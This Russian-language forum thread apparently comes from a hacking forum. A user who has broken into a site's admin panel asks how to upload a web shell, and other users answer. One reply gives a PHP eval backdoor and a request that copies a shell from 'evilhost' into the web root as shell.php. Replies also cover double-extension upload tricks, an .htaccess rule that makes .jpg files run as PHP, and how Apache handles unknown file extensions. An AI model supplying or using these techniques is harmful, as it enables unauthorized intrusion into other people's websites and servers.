Заливка шелла через правку html

Discussion in 'Песочница' started by Rasta18, 28 Dec 2013.

  1. Rasta18

    Rasta18 Member

    Joined:
    8 Jul 2009
    Messages:
    82
    Likes Received:
    7
    Reputations:
    0
    Вчера попал в админку.
    А в ней можно только новости в html редактировать, ток вот я попробывал вставить:

    Загрузка файлов
    PHP:
    <!DOCTYPE html>
    <
    html>
     <
    head>
      <
    meta charset="utf-8">
      <
    title>Отправка файла на сервер</title>
     </
    head>
     <
    body>
      <
    form enctype="multipart/form-data" method="post">
       <
    p><input type="file" name="f">
       <
    input type="submit" value="Отправить"></p>
      </
    form
     </
    body>
    </
    html>
    форма отображается на странице
    но файлы я так понял всё равно не загружаются... думаю прав нет.

    Есть ещё варианты для загрузки шелла через html ?
     
  2. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    211
    Likes Received:
    63
    Reputations:
    34
    вариантов вообше нет
     
  3. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    жжЁте

    по вашему файл сам себя будет копировать на жесткий диск? вы же не обрабатываете файл на стороне сервера
     
    _________________________
    1 person likes this.
  4. Inoms

    Inoms Member

    Joined:
    23 Jun 2013
    Messages:
    103
    Likes Received:
    29
    Reputations:
    45
    Дык для того, чтобы принять этот файл, на той странице, куда он отправляется (текущей) должен быть и обработчик, не так ли ? Так вы стучите пальцем об стену.
     
  5. Rasta18

    Rasta18 Member

    Joined:
    8 Jul 2009
    Messages:
    82
    Likes Received:
    7
    Reputations:
    0
    Видимо именно так.

    Неужели действительно нет вариантов??
     
  6. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    нет.
     
    _________________________
  7. next

    next New Member

    Joined:
    16 Aug 2003
    Messages:
    24
    Likes Received:
    1
    Reputations:
    0
    Варианты может и есть просто не через правку новостей
    Может в админе есть заливка картинок или других файлов ?
     
  8. Rasta18

    Rasta18 Member

    Joined:
    8 Jul 2009
    Messages:
    82
    Likes Received:
    7
    Reputations:
    0

    заливка картинок есть, но я к примеру заливаю даже картинку image.gif, а на сервере она сохраняется как 29120000.jpg

    это можно обойти?
     
  9. Inoms

    Inoms Member

    Joined:
    23 Jun 2013
    Messages:
    103
    Likes Received:
    29
    Reputations:
    45
    Увы. Lfi там случаем нигде нет с возможностью обрезки расширений ? так бы у вас был единственный шанс выполнить там шелл.
     
  10. Rasta18

    Rasta18 Member

    Joined:
    8 Jul 2009
    Messages:
    82
    Likes Received:
    7
    Reputations:
    0
    думаю нет.
    так как все странички сайта на html, но у меня когда-то доступ к нему был и знаю что оболочка вся на php, ничего кроме xss там не нашлось
     
  11. Take_IT

    Take_IT Banned

    Joined:
    11 Mar 2013
    Messages:
    381
    Likes Received:
    162
    Reputations:
    267
    Уважаемый ТС, хочу обратить Ваше внимание на одну мелочь - Варианты есть всегда (с)

    Что за движок?

    можно попробовать вставить php код с бекдором:
    PHP:
    @php
    eval($_REQUEST[e]);
    php@  
    Смотрим абсолютный путь:
    HTML:
    localhost/?e=phpinfo();
    Льем шелл:
    HTML:
    yoursite.com/news/1.html?e=copy("evilhost/shell.txt","/home/yoursite/shell.php");
    Это в свое время сработало на PHPShop CMS, кстати не так давно....
    Это как вариант номер раз)

    Вариант номер 2.1:
    Можно попробовать залить вместо картинки файл shell.php.jpg , допустим обработчик переименует его в 12312312312.php.jpg - это может прокатить, при определенных конфигах сервера....

    Вариант 2.2:
    Также можно попробовать залить shell.jpg

    Предварительно залив .htaccess следующего содержания:
    HTML:
    AddType application/x-httpd-php .jpg
    
    Тогда сервер будет обрабатывать .jpg файлы как приложение php и переименованный шелл с новым названием 123123123123.jpg отработает как пых файл)

    Вариант 2.3:
    Попробуй залить файл shell.php.g1f или shell.php.ololo

    файл shell.php.ololo имеет неизвестный формат, т.к. апачу не знакомо расширение .ololo он начнет обрабатывать наш шелл как PHP файл.


    PS а вообще, я уверен, что это далеко не все способы которые можно попробовать заливаясь из админки...
     
  12. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    умники собрались

    Тake_IT

    "@php
    eval($_REQUEST[e]);
    php@ "

    ты где встречал такие теги "@php php@" ?
    если в каком то темплейт двиге оно используется как пхп тег это не значит что оно везде будет работать.

    тс сказал что залить можно картинки, с чего ты взял что можно загрузить хтакцесс?

    "12312312312.php.jpg - это может прокатить, при определенных конфигах сервера...."
    ага, определенные конфиги, какой даун админ будет настроить сервер на обработку jpeg как php

    такие методы могут сработать в конкретных двигах, но в общем случай писать о них как о методах заливки шелла это глупо.
     
    _________________________
  13. Take_IT

    Take_IT Banned

    Joined:
    11 Mar 2013
    Messages:
    381
    Likes Received:
    162
    Reputations:
    267
    [offtop]Раньше ты попроще был)) [/offtop] :)
    эти теги я встречал минимум в 3 движках phpshop cms , Instant Update CMS, Blox CMS, могу еще вспомнить....
    учитывая то, что ТС совсем зеленый, я предположил что он может не совсем правильно описывать ситуацию, в частности, с загрузкой файлов. поэтому решил напомнить про несколько несложных методов)
    случаев когда файлы .php.gif запускаются - масса, на моей памяти это примерно 15-20%

    в конкретных двигах говорите?) а мы знаем с каким двигом столкнулся ТС ? а вдруг это тот самый, "конкретный"??

    PS мне кажется от твоего совета было бы больше проку, чем от критики)
     
  14. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    я выше уже отписался, что если нету конкретной инфы о двиге, то не имеет смысла описать какие то левые методы которые работают с очень низкой частотой
     
    _________________________
  15. Take_IT

    Take_IT Banned

    Joined:
    11 Mar 2013
    Messages:
    381
    Likes Received:
    162
    Reputations:
    267
    ну извините бл* )) если случаев, когда .php.gif обрабатывается как пхп 15-20% (1 из 5\6 - оказывается для тебя этого мало) , то этими способами похекалось минимум половина всех CMS которые я изучал)) а ты говоришь про низкую частоту... :confused:


    PS ага, пароль потерял, давно не заходил сюда)
     
  16. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,788
    Likes Received:
    872
    Reputations:
    859
    Бред пишешь. Если " .php.gif обрабатывается как пхп 15-20%" это всего лишь означает, что эти 20% были похеканы кем-то ранее. Ни одна нормальная CMS (без бэкдоров), ни один адекватный админ (не обкуренный) не позволит выполняться картинкам как пхп-код.

    Что-то прям из научной фантастики. Я согласен ещё на .ololo с натяжкой - да, встречается. Но вышепредложенное - вообще бред чистой воды.

    З.Ы. А залейте вообще *.txt. Вдруг выполнится как php? Ну а вдруг?
     
    _________________________
  17. Take_IT

    Take_IT Banned

    Joined:
    11 Mar 2013
    Messages:
    381
    Likes Received:
    162
    Reputations:
    267
    опачки! одепты подтянулись)))

    Ох, ну ничего себе кто меня учить собрался))))
    да я и не утверждаю что нормальный человек так настроит сервер :D суть не в том из за чего это работает(админ дурак или серв похекали раньше), суть в том, что это работает(фактически) и с достаточно большой вероятностью, пусть это будет даже 1 сервер из 10...
    А про то, как в нормальных CMS появляются бекдоры, я расскажу немного позже) как раз снял видео на эту тему :D
    с натяжкой?) а объясни почему это сработает не всегда и почему вообще работает?)
    file.php.ololo имеет неизвестное для апача расширение .ololo поэтому он будет обрабатывать file.php.ololo точно также как и file.php. а знаешь почему?? потому, что в случае если апач встречает файл с незнакомым расширением он начинает искать знакомое расширение с конца имени файла, т.е. фактически, если бы мы залили file.php.txt.ololo он бы выполнился как .txt. А не сработает это в том случае, если в дире куда льем файл не выполняется пых
    Зы вам че, квестики перестали делать?)) плохо, мозги как и мышцы надо тренировать))) И кстати, если для тебя вышеописанное фантастика, почитай хоть темы роа за 2009-2011 года, помнится там было много примеров)
    троллинг не засчитан, тренируйтесь лучше на кошках (с)
     
  18. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    [​IMG]
     
    _________________________
  19. Take_IT

    Take_IT Banned

    Joined:
    11 Mar 2013
    Messages:
    381
    Likes Received:
    162
    Reputations:
    267
    пардон, я не говорю что от этого нет никакой защиты и это работает в 100%, но ведь на локалке, в искусственных условиях, можно добиться самого разного результата и сделать что угодно) :)
     
  20. Ganz Euler

    Ganz Euler Member

    Joined:
    7 Oct 2013
    Messages:
    50
    Likes Received:
    13
    Reputations:
    10
    Какие там требования чтоб file.php.unknown_extension выполнялся как .php напомните пожалуйста.

    mod_mime enabled кажется, и что-то ещё видимо. У меня на локалке mod_mime вроде стоит, а код не выполняется.
     
Loading...